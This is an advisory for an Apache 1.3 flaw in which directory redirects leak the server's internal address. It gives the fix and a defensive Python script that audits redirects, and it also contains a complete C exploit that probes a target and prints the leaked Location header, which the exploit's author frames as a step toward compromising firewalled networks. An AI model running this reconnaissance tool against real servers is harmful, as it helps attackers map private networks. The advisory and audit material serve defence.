Apache Server Address Disclosure Vulnerability

Published: 2001-08-15
Updated: 2001-08-15
Severity: Medium
Threat type: Server information disclosure
Error type: Design error
Exploitation mode: Server mode

Affected systems
Apache Group Apache 1.3

Detailed description
The Apache web server contains a vulnerability that can lead to disclosure of the server's address. The problem arises when an HTTP request containing the URI of a directory is sent to the server: if the URI does not end with a '/' character, the server returns a 3xx redirection code to indicate that further action is needed to complete the request, and the 'Location' response header returned as part of that response contains the server's address. If the server sits behind a firewall, this can disclose the server's internal network address.

Test code

```c
/* Exploit for the Apache Server Address Disclosure Vulnerability
**
** by: magnum
** magnum@fuckthat.org
** http://fuckthat.org
**
** [explanation taken from http://securityfocus.com/vdb/?id=3169]
**
** A vulnerability has been discovered in Apache web server that may
** result in the disclosure of the server's address.
**
** The problem occurs when a HTTP request containing the URI of a directory
** is submitted to the server. If the URI does not contain a trailing '/'
** character, the server returns a 3xx redirection error code indicating that
** further action must be taken in order to fulfill the request. When this
** occurs, a 'Location' response-header containing the address of the server
** is returned as part of the response.
**
** In a situation where the request is redirected to the server behind a
** firewall, this could lead to the disclosure of the server's internal
** network address.
**
** --SNIP--
**
** As it was put so well in that explanation, an attacker could exploit this
** vulnerability to gain important information that could help you or an
** attacker to eventually compromise a network or server that resides behind
** an ipchains/NAT firewall, routing firewall, or many other different kinds
** of bastion hosts.
**
** Enjoy :)
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>        /* bzero() */
#include <arpa/inet.h>
#include <sys/time.h>

#define ERROR -1
#define MAXLEN 400

int main(int argc, char *argv[])
{
    int sock_fd;
    struct sockaddr_in dest_addr;
    struct hostent *he;
    char buf[1024];
    char request[1024] = "";    /* must start empty: it is filled below */
    char *p;
    int i;
    int jackmove;

    if (argc != 4) {
        printf("Usage: %s <hostname> <port> <directory>\n", argv[0]);
        printf("Example(verbose): %s www.linux.org 80 /info\n", argv[0]);
        printf("Example(specify): %s www.linux.org 80 /info | grep Location\n", argv[0]);
        printf("Example(output) : Location: http://127.0.0.3/supersecretshit/\n");
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {    /* get the host info */
        printf("Unknown host.\n");
        exit(1);
    }

    dest_addr.sin_family = AF_INET;
    i = atoi(argv[2]);
    dest_addr.sin_port = htons(i);
    dest_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(dest_addr.sin_zero), 8);    /* heh, sorry, no error checking */

    if ((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("Cannot open socket.\n");
        exit(1);
    }

    if (connect(sock_fd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) == -1) {
        printf("Could not connect to socket.\n");
        exit(1);
    }

    printf("Disclose - Exploit for the Apache Server Address Disclosure Vulnerability\n");
    printf("by: magnum - magnum@fuckthat.org - http://www.fuckthat.org\n\n");

    /* HEAD request for the directory as given (no trailing '/'), which makes
       the server answer with a 3xx redirect and a Location header. The request
       is built with a bounded snprintf() instead of strcat() into an
       uninitialised buffer. */
    snprintf(request, sizeof(request), "HEAD %s HTTP/1.0\n\n\n", argv[3]);

    sleep(1);
    send(sock_fd, request, strlen(request), 0);

    printf("Status: ");
    if ((jackmove = recv(sock_fd, buf, MAXLEN, 0)) == ERROR) {
        printf("recv error\n");
        close(sock_fd);
        exit(1);
    }
    printf("Done.\n");
    buf[jackmove] = '\0';

    /* Print from the Location header onwards; guard against its absence. */
    p = strstr(buf, "Location");
    if (p != NULL)
        printf("%s\n", p);
    else
        printf("No Location header in the response.\n");

    close(sock_fd);
    exit(0);
}
```

Solution
Turn off the 'UseCanonicalName' feature and specify the appropriate server name with ServerName.

Related information
magnum@fuckthat.org
http://fuckthat.org
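The following Python audit routine is an added example, not part of the original advisory or magnum's code. It shows the defensive side of the issue described above: given a raw HTTP response, it parses the status line and headers and reports whether a 3xx redirect's 'Location' header points at a private, loopback or link-local address (the internal-address disclosure) or at a host other than the name the server is supposed to advertise. The sample responses embedded below are constructed for offline use, not captured from any real server, and the host name www.example.com is an assumed placeholder.

```python
"""Audit HTTP redirect responses for server-address disclosure.

Added example (not from the advisory or from magnum's exploit). It inspects
the 'Location' header of a 3xx response and flags redirect targets that
expose a private/loopback/link-local address or a host name that differs
from the canonical name the server should be advertising.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed sample responses for offline use; not captured from any server.
LEAKY_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: Apache/1.3.19 (Unix)\r\n"
    "Location: http://10.1.2.3/info/\r\n"
    "Connection: close\r\n"
    "\r\n"
)
CLEAN_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: Apache/1.3.19 (Unix)\r\n"
    "Location: http://www.example.com/info/\r\n"
    "Connection: close\r\n"
    "\r\n"
)
NO_REDIRECT_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/1.3.19 (Unix)\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_response_head(raw):
    """Return (status_code, headers) parsed from the head of a raw response.

    Header names are lower-cased so lookups are case-insensitive.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit_redirect(raw, expected_host):
    """Classify a response for address disclosure.

    Returns (verdict, host) where verdict is one of:
      'no-redirect'       - not a 3xx response, nothing to check
      'no-location'       - 3xx without a Location header
      'relative-location' - Location has no host part, so nothing is exposed
      'internal-ip'       - Location names a private/loopback/link-local IP
      'host-mismatch'     - Location names a host other than expected_host
      'ok'                - Location matches the expected canonical host
    """
    status, headers = parse_response_head(raw)
    if not 300 <= status <= 399:
        return "no-redirect", None
    location = headers.get("location")
    if location is None:
        return "no-location", None
    host = urlsplit(location).hostname
    if host is None:
        return "relative-location", None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None  # a host name rather than a literal address
    if addr is not None and (addr.is_private or addr.is_loopback or addr.is_link_local):
        return "internal-ip", host
    if host.lower() != expected_host.lower():
        return "host-mismatch", host
    return "ok", host


if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("clean", CLEAN_RESPONSE),
                       ("no-redirect", NO_REDIRECT_RESPONSE)):
        print(label, audit_redirect(raw, "www.example.com"))
```

Running the audit against a server's own redirect responses, before and after applying the advisory's fix (UseCanonicalName turned off and ServerName set to the public name), gives a quick confirmation that directory redirects no longer carry an internal address; the 'host-mismatch' verdict also catches the case where the redirect is rewritten to some other non-canonical name.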